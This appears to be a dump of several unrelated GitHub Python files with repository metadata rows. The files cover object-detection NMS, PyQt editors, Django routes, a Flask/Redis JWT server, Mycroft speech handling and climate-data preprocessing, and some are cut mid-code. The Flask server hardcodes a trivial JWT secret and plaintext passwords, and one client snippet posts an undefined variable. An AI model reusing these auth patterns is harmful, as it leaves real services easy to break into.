boxes_list = tf.unstack(boxes, axis=1)
scores_list = tf.unstack(scores, axis=1)
selected_boxes, selected_scores, selected_classes = [], [], []
for i, (b, s) in enumerate(zip(boxes_list, scores_list)):
selected_indices = tf.image.non_max_suppression(
boxes=b, scores=s, max_output_size=max_boxes_per_class,
iou_threshold=iou_threshold, score_threshold=score_threshold,
)
selected_boxes += [tf.gather(b, selected_indices)]
selected_scores += [tf.gather(s, selected_indices)]
selected_classes += [i * tf.ones_like(selected_indices)]
selected_boxes = tf.concat(selected_boxes, axis=0)
selected_scores = tf.concat(selected_scores, axis=0)
selected_classes = tf.to_int32(tf.concat(selected_classes, axis=0))
return selected_boxes, selected_scores, selected_classes
def batch_multiclass_non_max_suppression(
boxes, scores, num_boxes_per_image,
score_threshold, iou_threshold,
max_boxes_per_class):
"""Same as multiclass_non_max_suppression but for a batch of images.
Arguments:
boxes: a float tensor with shape [N, num_classes, 4].
scores: a float tensor with shape [N, num_classes].
num_boxes_per_image: an int tensor with shape [batch_size],
where N = sum(num_boxes_per_image).
Returns:
boxes: a float tensor with shape [M, 4].
scores: a float tensor with shape [M].
classes: an int tensor with shape [M].
num_boxes_per_image: an int tensor with shape [batch_size].
"""
batch_size = num_boxes_per_image.shape[0].value
boxes_list = tf.split(boxes, num_or_size_splits=num_boxes_per_image, axis=0)
scores_list = tf.split(scores, num_or_size_splits=num_boxes_per_image, axis=0)
selected_boxes, selected_scores, selected_classes = [], [], []
num_selected_boxes_per_image = []
for i in range(batch_size):
b, s, c = multiclass_non_max_suppression(
boxes_list[i], scores_list[i],
score_threshold, iou_threshold,
max_boxes_per_class
)
n = tf.to_int32(tf.shape(b)[0])
selected_boxes.append(b)
selected_scores.append(s)
selected_classes.append(c)
num_selected_boxes_per_image.append(n)
boxes = tf.concat(selected_boxes, axis=0)
scores = tf.concat(selected_scores, axis=0)
classes = tf.concat(selected_classes, axis=0)
num_boxes_per_image = tf.stack(num_selected_boxes_per_image)
return boxes, scores, classes, num_boxes_per_image
|
TropComplique/light-head-rcnn
|
detector/utils/nms.py
|
nms.py
|
py
| 3,483 |
python
|
en
|
code
| 23 |
github-code
|
6
|
74743637626
|
import re
from PyQt4 import QtGui
from PyQt4 import QtCore
from PyQt4.QtCore import Qt
from customeditor import CustomEditor
from camelot.view.art import Icon
import camelot.types
class VirtualAddressEditor(CustomEditor):
def __init__(self, parent=None, editable=True, address_type=None, **kwargs):
CustomEditor.__init__(self, parent)
self._address_type = address_type
self.layout = QtGui.QHBoxLayout()
self.layout.setMargin(0)
self.combo = QtGui.QComboBox()
self.combo.addItems(camelot.types.VirtualAddress.virtual_address_types)
self.combo.setEnabled(editable)
if address_type:
self.combo.setVisible(False)
self.layout.addWidget(self.combo)
self.editor = QtGui.QLineEdit()
self.editor.setEnabled(editable)
self.layout.addWidget(self.editor)
self.setFocusProxy(self.editor)
self.editable = editable
nullIcon = Icon('tango/16x16/apps/internet-mail.png').getQIcon()
self.label = QtGui.QToolButton()
self.label.setIcon(nullIcon)
self.label.setAutoFillBackground(False)
self.label.setAutoRaise(True)
self.label.setEnabled(False)
self.label.setToolButtonStyle(Qt.ToolButtonIconOnly)
self.layout.addWidget(self.label)
self.editor.editingFinished.connect(self.emit_editing_finished)
self.editor.textEdited.connect(self.editorValueChanged)
self.combo.currentIndexChanged.connect(self.comboIndexChanged)
self.setLayout(self.layout)
self.setAutoFillBackground(True)
self.checkValue(self.editor.text())
@QtCore.pyqtSlot()
def comboIndexChanged(self):
self.checkValue(self.editor.text())
self.emit_editing_finished()
def set_value(self, value):
value = CustomEditor.set_value(self, value)
if value:
self.editor.setText(value[1])
idx = camelot.types.VirtualAddress.virtual_address_types.index(self._address_type or value[0])
self.combo.setCurrentIndex(idx)
icon = Icon('tango/16x16/devices/printer.png').getQIcon()
# These icons don't exist any more in the new tango icon set
# if str(self.combo.currentText()) == 'phone':
# icon = Icon('tango/16x16/devices/phone.png').getQIcon()
if str(self.combo.currentText()) == 'fax':
icon = Icon('tango/16x16/devices/printer.png').getQIcon()
# if str(self.combo.currentText()) == 'mobile':
# icon = Icon('tango/16x16/devices/mobile.png').getQIcon()
# if str(self.combo.currentText()) == 'im':
# icon = Icon('tango/16x16/places/instant-messaging.png').getQIcon()
# if str(self.combo.currentText()) == 'pager':
# icon = Icon('tango/16x16/devices/pager.png').getQIcon()
if str(self.combo.currentText()) == 'email':
icon = Icon('tango/16x16/apps/internet-mail.png').getQIcon()
#self.label.setFocusPolicy(Qt.StrongFocus)
self.label.setAutoRaise(True)
#self.label.setAutoFillBackground(True)
self.label.setIcon(icon)
self.label.setEnabled(self.editable)
self.label.clicked.connect(
lambda:self.mailClick(self.editor.text())
)
else:
self.label.setIcon(icon)
#self.label.setAutoFillBackground(False)
self.label.setAutoRaise(True)
self.label.setEnabled(self.editable)
self.label.setToolButtonStyle(Qt.ToolButtonIconOnly)
# self.update()
# self.label.update()
# self.layout.update()
self.checkValue(value[1])
def get_value(self):
value = (unicode(self.combo.currentText()), unicode(self.editor.text()))
return CustomEditor.get_value(self) or value
def set_enabled(self, editable=True):
self.combo.setEnabled(editable)
self.editor.setEnabled(editable)
if not editable:
self.label.setEnabled(False)
else:
if self.combo.currentText() == 'email':
self.label.setEnabled(True)
def checkValue(self, text):
if self.combo.currentText() == 'email':
email = unicode(text)
mailCheck = re.compile('^\S+@\S+\.\S+$')
if not mailCheck.match(email):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
elif self.combo.currentText() == 'phone' \
or self.combo.currentText() == 'pager' \
or self.combo.currentText() == 'fax' \
or self.combo.currentText() == 'mobile':
number = unicode(text)
numberCheck = re.compile('^[0-9 ]+$')
if not numberCheck.match(number):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
else:
Check = re.compile('^.+$')
if not Check.match(unicode(text)):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
def editorValueChanged(self, text):
self.checkValue(text)
def mailClick(self, adress):
url = QtCore.QUrl()
url.setUrl('mailto:%s?subject=Subject'%str(adress))
QtGui.QDesktopServices.openUrl(url)
def emit_editing_finished(self):
self.value = []
self.value.append(str(self.combo.currentText()))
self.value.append(str(self.editor.text()))
self.set_value(self.value)
self.label.setFocus()
# emiting editingFinished without a value for the mechanism itself will lead to
# integrity errors
if self.value[1]:
self.editingFinished.emit()
def set_background_color(self, background_color):
if background_color:
palette = self.editor.palette()
palette.setColor(self.backgroundRole(), background_color)
self.editor.setPalette(palette)
else:
return False
|
kurtraschke/camelot
|
camelot/view/controls/editors/virtualaddresseditor.py
|
virtualaddresseditor.py
|
py
| 7,474 |
python
|
en
|
code
| 4 |
github-code
|
6
|
34084173801
|
from django.conf.urls.defaults import patterns, url
from django.template.defaultfilters import slugify
from rc.resources.views import ResourceItemListView
from rc.resources.apps.operations import models
def green_building_url(url_string, building_type, image_url=None,
image_alt=None, image_caption=None,
buildings_name=None, model=models.CampusGreenBuilding):
if not buildings_name:
buildings_name = ' '.join(building_type.split()[1:]).lower()
return url(url_string,
ResourceItemListView.as_view(
model=model,
queryset=model.objects.published().filter(
type__type=building_type).order_by(
'type', 'certification', 'organization__name'),
template_name='operations/campusgreenbuilding_list.html'),
name=slugify(building_type),
kwargs={'cert_order': dict(models.CampusGreenBuilding.LEED_LEVELS),
'title': building_type,
'image_url': image_url,
'image_alt': image_alt,
'image_caption': image_caption,
'buildings_name': buildings_name,
'member_only': True})
urlpatterns = patterns('',
url(r'^campus-alternative-transportation-websites$',
ResourceItemListView.as_view(
model=models.TransportationWebsite,
queryset=models.TransportationWebsite.objects.published().order_by(
'organization__name')),
name='transportation-websites',
kwargs={'member_only': True, 'title': 'Campus Alternative Transportation Websites'}),
url(r'^bottled-water-elimination-and-reduction$',
ResourceItemListView.as_view(
model=models.BottledWaterBan,
queryset=models.BottledWaterBan.objects.published().order_by(
'type', 'organization__name')),
name='bottled-water-bans',
kwargs={'type_list': [ level[0] for level in
models.BottledWaterBan.BAN_TYPES ],
'type_dict': dict(models.BottledWaterBan.BAN_TYPES),
'title': 'Campus Bottled Water Bans and Reduction Campaigns',
'member_only': True}),
url(r'^campus-building-energy-dashboards$',
ResourceItemListView.as_view(
model=models.BuildingDashboard,
queryset=models.BuildingDashboard.objects.published().order_by(
'partner__name', 'organization__name')),
name='building-dashboards',
kwargs={'title': 'Campus Building Energy Dashboards',
'member_only': True}),
url(r'^biodiesel-campus-fleets$',
ResourceItemListView.as_view(
model=models.BiodieselFleet,
queryset=models.BiodieselFleet.objects.published().order_by(
'production', 'organization__country',
'organization__name')),
name='biodiesel-fleets',
kwargs={'member_only': True,
'production_types':
dict(models.BiodieselFleet.PRODUCTION_TYPE)}),
url(r'^campus-bicycle-plans$',
ResourceItemListView.as_view(
model=models.BicyclePlan,
queryset=models.BicyclePlan.objects.published().order_by(
'organization__name')),
name='bicycle-plans',
kwargs={'member_only': True}),
url(r'^campus-car-bans$',
ResourceItemListView.as_view(
model=models.CarBan,
queryset=models.CarBan.objects.published().order_by(
'-type', 'organization__name')),
name='car-bans',
kwargs={'ban_types': dict(models.CarBan.BAN_TYPES)}),
url(r'^campus-commuter-surveys$',
ResourceItemListView.as_view(
model=models.CommuterSurvey,
queryset=models.CommuterSurvey.objects.published().order_by(
'type', 'organization__name')),
name='commuter-surveys',
kwargs={'survey_types': dict(models.CommuterSurvey.SURVEY_TYPES),
'member_only': True}),
url(r'^campus-electric-vehicle-fleets$',
ResourceItemListView.as_view(
model=models.ElectricFleet,
queryset=models.ElectricFleet.objects.published().order_by(
'organization__country', 'organization__name')),
name='electric-fleets',
kwargs={'member_only': True}),
url(r'^campus-energy-plans$',
ResourceItemListView.as_view(
model=models.EnergyPlan,
queryset=models.EnergyPlan.objects.published().order_by(
'organization__name')),
name='energy-plans',
kwargs={'member_only': True}),
url(r'^campus-energy-plans$',
ResourceItemListView.as_view(
model=models.EnergyPlan,
queryset=models.EnergyPlan.objects.published().order_by(
'organization__name')),
name='energy-plans',
kwargs={'member_only': True}),
url(r'^campus-energy-websites$',
ResourceItemListView.as_view(
model=models.EnergyWebsite,
queryset=models.EnergyWebsite.objects.published().order_by(
'organization__name')),
name='energy-websites'),
url(r'^campus-global-warming-commitments$',
ResourceItemListView.as_view(
model=models.GlobalWarmingCommitment,
queryset=models.GlobalWarmingCommitment.objects.published().order_by(
'organization__name', 'date')),
kwargs={'member_only': True},
name='global-warming-commitments',
),
url(r'^campus-hybrid-vehicle-fleets$',
ResourceItemListView.as_view(
model=models.HybridFleet,
queryset=models.HybridFleet.objects.published().order_by(
'organization__country', 'organization__name')),
name='hybrid-fleets',
kwargs={'member_only': True}),
url(r'^campus-recycling-and-waste-minimization-websites$',
ResourceItemListView.as_view(
model=models.RecyclingWebsite,
queryset=models.RecyclingWebsite.objects.published().order_by(
'organization__name')),
name='recycling-websites',
kwargs={'title': 'Campus Recycling & Waste Minimization Websites',
'member_only': True}),
url(r'^campus-water-conservation-efforts$',
ResourceItemListView.as_view(
model=models.WaterConservationEffort,
queryset=models.WaterConservationEffort.objects.published().order_by(
'organization__country', 'organization__name')),
name='water-conservation-efforts',
kwargs={'member_only': True}),
url(r'^wind-power-campus-1$',
ResourceItemListView.as_view(
model=models.WindTurbine,
queryset=models.WindTurbine.objects.published().order_by(
'-size', 'organization__name')),
name='wind-turbines',
kwargs={'member_only': True,
'title': 'Wind Turbine Installations on Campus'}),
url(r'^carsharing-campus$',
ResourceItemListView.as_view(
model=models.CarShare,
queryset=models.CarShare.objects.published().order_by(
'partner__name', 'organization__name')),
name='car-shares',
kwargs={'member_only': True}),
url(r'^renewable-energy-research-centers$',
ResourceItemListView.as_view(
model=models.RenewableResearchCenter,
queryset=models.RenewableResearchCenter.objects.published().order_by(
'organization__name')),
name='renewable-research-centers',
kwargs={
'title': 'Renewable Energy Research Centers',
'member_only': True,
}),
url(r'^campus-installations-stationary-fuel-cells$',
ResourceItemListView.as_view(
model=models.FuelCell,
queryset=models.FuelCell.objects.published().order_by('-size',
'organization__name')),
name='fuel-cells',
kwargs={
'title': 'Campus Installations of Stationary Fuel Cells',
'member_only': True,
}),
url(r'^sustainable-dining-initiatives-campus$',
ResourceItemListView.as_view(
model=models.DiningInitiative,
queryset=models.DiningInitiative.objects.published().order_by(
'ownership', 'organization__name')),
name='dining-initiatives',
kwargs={'owners': dict(models.DiningInitiative.OWNERS),
'member_only': True}),
url(r'^campus-greenhouse-gas-emissions-inventories$',
ResourceItemListView.as_view(
model=models.GHGInventory,
queryset=models.GHGInventory.objects.published().order_by(
'methodology', 'organization__name')),
name='ghg-inventories',
kwargs={'methodology_types': dict(models.GHGInventory.METHODOLOGY_TYPES),
'member_only': False}),
url(r'^sustainable-landscaping-campus$',
ResourceItemListView.as_view(
model=models.SustainableLandscape,
queryset=models.SustainableLandscape.objects.published().order_by(
'organization__name')),
name='sustainable-landscapes',
kwargs={
'title': 'Sustainable Landscaping Initiatives on Campus',
'member_only': True,
}),
url(r'^links-related-sustainable-purchasing-campus$',
ResourceItemListView.as_view(
model=models.PurchasingLink,
queryset=models.PurchasingLink.objects.published().order_by(
'type', 'organization__name')),
name='purchasing-links',
kwargs={'type_list': dict(models.PurchasingLink.LINK_TYPES),
'title': 'Sustainable Purchasing Initiatives on Campus',
'member_only': True}),
url(r'^campus-universal-transit-passes$',
ResourceItemListView.as_view(
model=models.TransitPass,
queryset=models.TransitPass.objects.published().order_by(
'-type', 'organization__country',
'organization__name')),
name='transit-passes',
kwargs={
'type_list': dict(models.TransitPass.PASS_TYPES),
'member_only': True,
}),
green_building_url(
url_string=r'^athletic-recreation-centers-stadiums$',
building_type='Green Athletic Buildings',
image_url='http://www.aashe.org/files/univ_of_arizona_rec_center_0.jpg',
image_alt='Univ Arizona',
image_caption='University of Arizona Recreation Center'),
green_building_url(
url_string=r'^green-student-centers$',
building_type='Green Student Centers',
image_url='http://www.aashe.org/files/sju_mckeown_0.jpg',
image_alt='SJU McKeown',
image_caption='St. John\'s University McKeown Center',
),
green_building_url(
url_string=r'^green-libraries-campus$',
building_type='Green Libraries on Campus',
image_url='http://www.aashe.org/files/thompson_library_1.jpg',
image_alt='OSU Thompson Library',
image_caption='Ohio State University Thompson Library',
buildings_name='libraries',
),
green_building_url(
url_string=r'^green-residence-halls$',
building_type='Green Residence Halls',
image_url='http://www.aashe.org/files/ashdown_house_mit.jpg',
image_alt='MIT Ashdown House',
image_caption='MIT Ashdown House',
# Model is empty, dunno why (mt)
model=models.GreenResidenceHall,
),
green_building_url(
url_string=r'^green-science-buildings$',
building_type='Green Science Buildings',
image_url='http://www.aashe.org/files/brandeis.jpg',
image_alt='Brandeis University Shapiro Science Center',
image_caption='Brandeis University Shapiro Science Center',
),
)
|
AASHE/django-irc
|
rc/resources/apps/operations/urls.py
|
urls.py
|
py
| 12,244 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35862928120
|
import json
import redis
from flask import Flask, request, Response, make_response
import base64
from jwt.api_jwt import PyJWT
app = Flask(__name__)
d = {'write': '1', 'read': '2', 'delete': '3'}
HOST = 'rediska'
Key = '12345'
@app.route('/auth/')
def requestic4():
user = request.authorization.username
password = request.authorization.password
if d.get(user) != None and d[str(user)] == password:
payload = {"role": str(user)}
jwt_Obj = PyJWT()
jwt_token = jwt_Obj.encode(payload=payload, key=Key)
rez = make_response(str(jwt_token, 'UTF-8'), 200)
rez.headers['Authorization'] = str(jwt_token, 'UTF-8')
return rez
else:
return make_response("invalid user or password" + str(user) + ' ' + str(password), 400)
@app.route('/<key>/', methods=['PUT'])
def requestic1(key):
key = int("{}".format(key))
data = json.loads(request.data)
Jwt1 = request.headers['Authorization']
message = data.get("message")
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "write":
if key == None or message == None:
return Response(status=400)
else:
cache = redis.Redis(host=HOST, port=6379)
cache.ping()
if cache.exists(key):
cache.delete(key)
cache.set(key, json.dumps(message))
return make_response("changed", 200)
else:
cache.set(key, json.dumps(message))
return make_response({key: message}, 201)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
@app.route('/<key>/', methods=['GET'])
def requestic2(key):
key=int("{}".format(key))
Jwt1 = request.headers['Authorization']
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "read":
cache = redis.Redis(host = HOST, port=6379)
cache.ping()
if cache.exists(key):
res = json.loads(cache.get(key))
return make_response({"message": res}, 200)
else:
return Response(status=400)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
@app.route('/<key>/', methods=['DELETE'])
def requestic3(key):
key=int("{}".format(key))
Jwt1 = request.headers['Authorization']
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "delete":
cache = redis.Redis(host = HOST, port=6379)
cache.ping()
if key == None:
return Response(status = 400)
else:
if cache.exists(key):
res = json.loads(cache.get(key))
cache.delete(key)
return make_response({"message": res}, 204)
else:
return Response(status=404)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
if __name__ == '__main__':
app.run(host = '0.0.0.0')
|
ZharkovMihail/server_with_jwt
|
server.py
|
server.py
|
py
| 2,843 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43073911588
|
"""
年化因子
"""
def annualization_factor(period):
"""
返回对应周期(period)所需的年化因子
Parameters
---------
period: str [daily, weekly, monthly, yearly]
定义调仓周期
Returns
-------
annualization_factor : float
年化因子
"""
try:
factor = ANNUALIZATION_FACTORS[period]
except KeyError:
raise ValueError(
"Period应当为daily, weekly, monthly, yearly中的一种"
)
return factor
BDAYS_PER_YEAR = 244
BDAYS_PER_MONTH = 20
MONTHS_PER_YEAR = 12
WEEKS_PER_YEAR = 52
YEAR_PER_YEAR = 1
ANNUALIZATION_FACTORS = {
'daily': BDAYS_PER_YEAR,
'weekly': WEEKS_PER_YEAR,
'monthly': MONTHS_PER_YEAR,
'yearly': YEAR_PER_YEAR
}
|
SkyBlueRW/PortAttribute
|
portattr/const/annualization.py
|
annualization.py
|
py
| 769 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23113245409
|
#-*- coding: utf-8 -*-
#-----------------------------------------------------------------------#
# Autor: Luis Enrique Rojas Desales #
#-----------------------------------------------------------------------#
# Este codigo esta liberado bajo licencia GPL. #
#-----------------------------------------------------------------------#
'''
Descarga Masiva SAT
Luis E. Rojas Desales
'''
from Interfaz import ListaRFC
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QMainWindow
from PySide2 import QtCore
import os
import configparser
class ListaC(QMainWindow):
def __init__(self, parent):
self.parent = parent
super().__init__()
self.ui = ListaRFC.Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self.setWindowIcon(QIcon('cfdi.ico'))
self.inicio()
def inicio(self):
contenido = os.listdir('C:/CFDIs/')
for i in range(len(contenido)):
self.ui.lista.addItem(contenido[i])
self.ui.lista.itemDoubleClicked.connect(self.onClicked)
self.ui.aceptar.clicked.connect(self.aceptar)
def onClicked(self, item):
#QMessageBox.information(self, "Info", item.text())
self.close()
configuracion = configparser.ConfigParser()
configuracion.read('C:/CFDIs/' + item.text() + '/datos.cfg')
self.parent.ui.lrfc.setText(configuracion['Contribuyente']['rfc'])
self.parent.ui.lrazon.setText(configuracion['Contribuyente']['razon'])
self.parent.cargar(configuracion['Contribuyente']['rfc'])
def aceptar(self):
item = self.ui.lista.currentItem()
self.close()
configuracion = configparser.ConfigParser()
configuracion.read('C:/CFDIs/' + item.text() + '/datos.cfg')
self.parent.ui.lrfc.setText(configuracion['Contribuyente']['rfc'])
self.parent.ui.lrazon.setText(configuracion['Contribuyente']['razon'])
self.parent.cargar(configuracion['Contribuyente']['rfc'])
|
ikiex/CFDIMasivo
|
CFDI/Controlador/lista.py
|
lista.py
|
py
| 2,079 |
python
|
es
|
code
| 3 |
github-code
|
6
|
3654388040
|
import re
import time
from threading import Lock
from mycroft.configuration import Configuration
from mycroft.metrics import report_timing, Stopwatch
from mycroft.tts import TTSFactory
from mycroft.util import create_signal, check_for_signal
from mycroft.util.log import LOG
from mycroft.messagebus.message import Message
from mycroft.tts.remote_tts import RemoteTTSTimeoutException
from mycroft.tts.mimic_tts import Mimic
bus = None # Mycroft messagebus connection
config = None
tts = None
tts_hash = None
lock = Lock()
mimic_fallback_obj = None
_last_stop_signal = 0
def _start_listener(message):
"""
Force Mycroft to start listening (as if 'Hey Mycroft' was spoken)
"""
create_signal('startListening')
def handle_speak(event):
"""
Handle "speak" message
"""
config = Configuration.get()
Configuration.init(bus)
global _last_stop_signal
# Get conversation ID
if event.context and 'ident' in event.context:
ident = event.context['ident']
else:
ident = 'unknown'
start = time.time() # Time of speech request
with lock:
stopwatch = Stopwatch()
stopwatch.start()
utterance = event.data['utterance']
if event.data.get('expect_response', False):
# When expect_response is requested, the listener will be restarted
# at the end of the next bit of spoken audio.
bus.once('recognizer_loop:audio_output_end', _start_listener)
# This is a bit of a hack for Picroft. The analog audio on a Pi blocks
# for 30 seconds fairly often, so we don't want to break on periods
# (decreasing the chance of encountering the block). But we will
# keep the split for non-Picroft installs since it give user feedback
# faster on longer phrases.
#
# TODO: Remove or make an option? This is really a hack, anyway,
# so we likely will want to get rid of this when not running on Mimic
if (config.get('enclosure', {}).get('platform') != "picroft" and
len(re.findall('<[^>]*>', utterance)) == 0):
# Remove any whitespace present after the period,
# if a character (only alpha) ends with a period
# ex: A. Lincoln -> A.Lincoln
# so that we don't split at the period
utterance = re.sub(r'\b([A-za-z][\.])(\s+)', r'\g<1>', utterance)
chunks = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\;|\?)\s',
utterance)
for chunk in chunks:
# Check if somthing has aborted the speech
if (_last_stop_signal > start or
check_for_signal('buttonPress')):
# Clear any newly queued speech
tts.playback.clear()
break
try:
mute_and_speak(chunk, ident)
except KeyboardInterrupt:
raise
except Exception:
LOG.error('Error in mute_and_speak', exc_info=True)
else:
mute_and_speak(utterance, ident)
stopwatch.stop()
report_timing(ident, 'speech', stopwatch, {'utterance': utterance,
'tts': tts.__class__.__name__})
def mute_and_speak(utterance, ident):
"""
Mute mic and start speaking the utterance using selected tts backend.
Args:
utterance: The sentence to be spoken
ident: Ident tying the utterance to the source query
"""
global tts_hash
# update TTS object if configuration has changed
if tts_hash != hash(str(config.get('tts', ''))):
global tts
# Stop tts playback thread
tts.playback.stop()
tts.playback.join()
# Create new tts instance
tts = TTSFactory.create()
tts.init(bus)
tts_hash = hash(str(config.get('tts', '')))
LOG.info("Speak: " + utterance)
try:
tts.execute(utterance, ident)
except RemoteTTSTimeoutException as e:
LOG.error(e)
mimic_fallback_tts(utterance, ident)
except Exception as e:
LOG.error('TTS execution failed ({})'.format(repr(e)))
def mimic_fallback_tts(utterance, ident):
global mimic_fallback_obj
# fallback if connection is lost
config = Configuration.get()
tts_config = config.get('tts', {}).get("mimic", {})
lang = config.get("lang", "en-us")
if not mimic_fallback_obj:
mimic_fallback_obj = Mimic(lang, tts_config)
tts = mimic_fallback_obj
LOG.debug("Mimic fallback, utterance : " + str(utterance))
tts.init(bus)
tts.execute(utterance, ident)
def handle_stop(event):
"""
handle stop message
"""
global _last_stop_signal
if check_for_signal("isSpeaking", -1):
_last_stop_signal = time.time()
tts.playback.clear() # Clear here to get instant stop
bus.emit(Message("mycroft.stop.handled", {"by": "TTS"}))
def init(messagebus):
""" Start speech related handlers.
Arguments:
messagebus: Connection to the Mycroft messagebus
"""
global bus
global tts
global tts_hash
global config
bus = messagebus
Configuration.init(bus)
config = Configuration.get()
bus.on('mycroft.stop', handle_stop)
bus.on('mycroft.audio.speech.stop', handle_stop)
bus.on('speak', handle_speak)
bus.on('mycroft.mic.listen', _start_listener)
tts = TTSFactory.create()
tts.init(bus)
tts_hash = config.get('tts')
def shutdown():
if tts:
tts.playback.stop()
tts.playback.join()
if mimic_fallback_obj:
mimic_fallback_obj.playback.stop()
mimic_fallback_obj.playback.join()
|
injones/mycroft_ros
|
scripts/mycroft/audio/speech.py
|
speech.py
|
py
| 5,795 |
python
|
en
|
code
| 5 |
github-code
|
6
|
72435188028
|
import requests
import json
URL = "http://localhost:8000/auth/users/"
def post_data():
# data = {
# "emial":"[email protected]",
# "name":"AdityaRokade",
# "password":"djangoroot",
# "re_password":"djangoroot",
# "first_name":"adi",
# "last_name":"rokade"
# }
# data ={
# 'email':'[email protected]',
# 'name':'AdityaRokade',
# 'password':'djangoroot',
# 're_password':'djangoroot',
# 'first_name':'adi',
# 'last_name':'rokade'
# }
# print(type(data))
# print("myapp1")
# json_data = json.dumps(data)
# print("myapp2",json_data)
# print(type(json_data))
r = requests.post(url = URL, data = data)
data = r.json()
print(data)
post_data()
|
adityarokade/social_book
|
social_book/myapp.py
|
myapp.py
|
py
| 805 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39129545830
|
from __future__ import absolute_import, division, print_function
import os
from subprocess import check_call
import logging
import importlib
import tempfile
import yaml
from datetime import datetime
import numpy as np
import dask
import xarray as xr
import cftime
import esmlab
import data_catalog
#-- settings (move to config.yml or similar)
USER = os.environ['USER']
dirout = f'/glade/scratch/{USER}/calcs'
if not os.path.exists(dirout):
os.makedirs(dirout)
tmpdir = f'{dirout}/work'
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
logging.basicConfig(level=logging.INFO)
#-------------------------------------------------------------------------------
#-- methods
#-------------------------------------------------------------------------------
def pop_calc_zonal_mean(file_in):
'''
compute zonal mean of POP field
in lieau of wrapping klindsay's zon_avg program so as to operate on
an `xarray` dataset: write to file, compute, read back.
'''
za = '/glade/u/home/klindsay/bin/za'
fid,file_out = tempfile.mkstemp(dir=tmpdir,
prefix='za-',
suffix='.nc')
rmask_file = '/glade/work/mclong/grids/PacAtlInd_REGION_MASK_gx1v6.nc'
check_call([za,'-O','-rmask_file',rmask_file,'-o',file_out,file_in])
return file_out
class yaml_operator(yaml.YAMLObject):
'''A wrapper used for defining callable functions in YAML.
For example:
!operator
module: esmlab.climatology
function: compute_mon_climatology
kwargs: {}
'''
yaml_tag = u'!operator'
def __init__(self, module, function, kwargs={}):
'''Initialize attributes'''
self.module = module
self.func = function
self.kwargs = kwargs
def __repr__(self):
'''Return string represention.'''
return getattr(importlib.import_module(self.module),
self.function).__repr__()
def __call__(self, val):
'''Call the function!'''
return getattr(importlib.import_module(self.module),
self.function)(val, **self.kwargs)
class process_data_source(object):
'''Class to support preprocessing operations.'''
def __init__(self, analysis_name, analysis_recipes, isderived=False,
clobber=False, **query_kwargs):
import popeos
importlib.reload(popeos)
#-- parse query: hardwired now for certain fields
self.experiment = query_kwargs['experiment']
self.variable = query_kwargs.pop('variable')
# get the analysis definition
self.analysis_name = analysis_name
with open(analysis_recipes) as f:
analysis_defs = yaml.load(f)
analysis = analysis_defs[analysis_name]
if 'description' in analysis:
self.analysis_description = analysis['description']
self.operators = analysis.pop('operators', [lambda ds: ds])
self.sel_kwargs = analysis.pop('sel_kwargs', {})
self.isel_kwargs = analysis.pop('isel_kwargs', {})
self.derived_var_def = analysis.pop('derived_var_def', None)
self.file_format = analysis.pop('file_format', 'nc')
if self.file_format not in ['nc','zarr']:
raise ValueError(f'unknown file format: {self.file_format}')
if isderived:
with open('derived_variable_definitions.yml') as f:
derived_var_defs = yaml.load(f)
derived_var_def = derived_var_defs[self.variable]
self.vars_dependent = derived_var_def['vars_dependent']
self.operators = derived_var_def['methods'] + self.operators
#-- set some attrs
self.dirout = os.path.join(dirout, 'processed_collections')
#-- pull specified dataset from catalog
self.catalog = data_catalog.get_catalog()
ensembles = data_catalog.find_in_index(**query_kwargs).ensemble.unique()
if len(ensembles) == 0:
raise ValueError(f'catalog contains no data for this query:\n'
f'{query_kwargs}')
self.n_members = len(ensembles)
self.cache_locations = []
self.input = [] # if the cached_locations are present,
# then this list will be empty in the returned
# object. Could be that the orig files are gone,
# (off disk) but the cache remains.
for ens_i in ensembles:
file_out = '.'.join([self.catalog,
self.experiment,
'%03d'%ens_i,
self.analysis_name,
self.variable,
self.file_format])
file_out = os.path.join(self.dirout,file_out)
self.cache_locations.append(file_out)
if os.path.exists(file_out) and clobber:
check_call(['rm','-fr',file_out]) # zarr files are directories
if not os.path.exists(file_out):
if not isderived:
data_desc = data_catalog.get_entries(ensemble=ens_i,
variable=self.variable,
**query_kwargs)
n_files = len(data_desc['files'])
else:
data_desc = [data_catalog.get_entries(ensemble=ens_i,
variable=v,
**query_kwargs)
for v in self.vars_dependent]
n_files = len(data_desc[0]['files'])
if n_files > 0:
self._process(file_out, data_desc)
else:
self.cache_locations.pop(-1)
logging.warning(f'No data to generate {file_out}.')
self.input.append(data_desc)
def __repr__(self):
'''Return compact string represention of self.'''
ens_str = '000'
if self.n_members > 1:
ens_str = f'000-{self.n_members:03d}'
